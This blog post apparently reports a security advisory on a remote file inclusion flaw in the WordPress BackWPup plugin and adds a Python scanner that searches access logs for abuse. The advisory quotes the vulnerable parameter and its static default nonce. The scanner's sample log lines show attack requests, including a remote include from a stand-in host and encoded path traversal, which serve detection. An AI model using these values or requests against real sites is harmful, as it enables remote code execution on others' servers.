Social Media Security

SocSec – The Social Media Security Website

WordPress Vulnerability in BackWPup Plugin

A remote code execution vulnerability has been discovered in the WordPress backup utility BackWPup.

According to Sydney (Australia) company Sense of Security, which published the advisory along with a proof-of-concept, the vulnerability allows local or remote PHP files to be passed to a component of the utility.

“The input passed to the component wp_xml_export.php via the ‘wpabs’ variable allows the inclusion and execution of local or remote PHP files as long as a ‘_nonce’ value is known. The ‘_nonce’ value relies on a static constant which is not defined in the script meaning that it defaults to the value ‘822728c8d9’”, the advisory states.

Sense of Security says the vulnerability affects at least BackWPup Version 1.6.1 (the platform on which it has been tested), and users should upgrade to Version 1.7.1.
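
Until every site is upgraded, access logs can be checked for requests that match the advisory's description. The Python below is an added example, not code from the advisory or the plugin. It assumes common/combined log format with `wpabs` in the query string; the log lines are constructed and `/PLUGIN_PATH/` is a placeholder for the plugin directory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

DEFAULT_NONCE = "822728c8d9"         # static default quoted in the advisory
TARGET_SCRIPT = "wp_xml_export.php"  # component named in the advisory
# Client, request URI and status from a common/combined access-log line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
# scheme://, protocol-relative //, UNC \\ or data: means the include leaves the host.
REMOTE_RE = re.compile(r'^(?:[a-z][a-z0-9+.-]+://|//|\\\\|data:)', re.I)

# Constructed sample lines; /PLUGIN_PATH/ is a placeholder, hosts are reserved names.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Mar/2011:10:00:01 +0000] "GET /PLUGIN_PATH/wp_xml_export.php?_nonce=822728c8d9&wpabs=http%3A%2F%2Fhost.invalid%2F HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Mar/2011:10:00:05 +0000] "GET /PLUGIN_PATH/wp_xml_export.php?_nonce=822728c8d9&wpabs=..%252F..%252Ftmp%252F HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Mar/2011:10:02:00 +0000] "GET /PLUGIN_PATH/wp_xml_export.php?_nonce=aaaaaaaaaa&wpabs=%2Fsrv%2Fwww%2Fsite%2F HTTP/1.1" 200 2048',
    '203.0.113.9 - - [01/Mar/2011:10:03:00 +0000] "GET /index.php?wpabs=http://host.invalid/ HTTP/1.1" 200 100',
]

def classify_wpabs(value):
    """Return 'remote', 'traversal' or 'local' after undoing nested URL encoding."""
    for _ in range(2):  # parse_qs decodes once; catch double/triple encoding too
        value = unquote(value)
    value = value.strip()
    if REMOTE_RE.match(value):
        return "remote"
    if ".." in value or "\x00" in value:
        return "traversal"
    return "local"  # assumption: a plain local path is the expected use

def scan(lines):
    """Report every request to the export script that carries a wpabs parameter."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        client, uri, status = m.groups()
        parts = urlsplit(uri)
        if not parts.path.lower().endswith("/" + TARGET_SCRIPT):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        for value in query.get("wpabs", []):
            findings.append({"line": lineno, "client": client, "status": int(status),
                             "kind": classify_wpabs(value),
                             "default_nonce": DEFAULT_NONCE in query.get("_nonce", [])})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in standard access logs, so a clean result from this check does not rule out earlier abuse.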
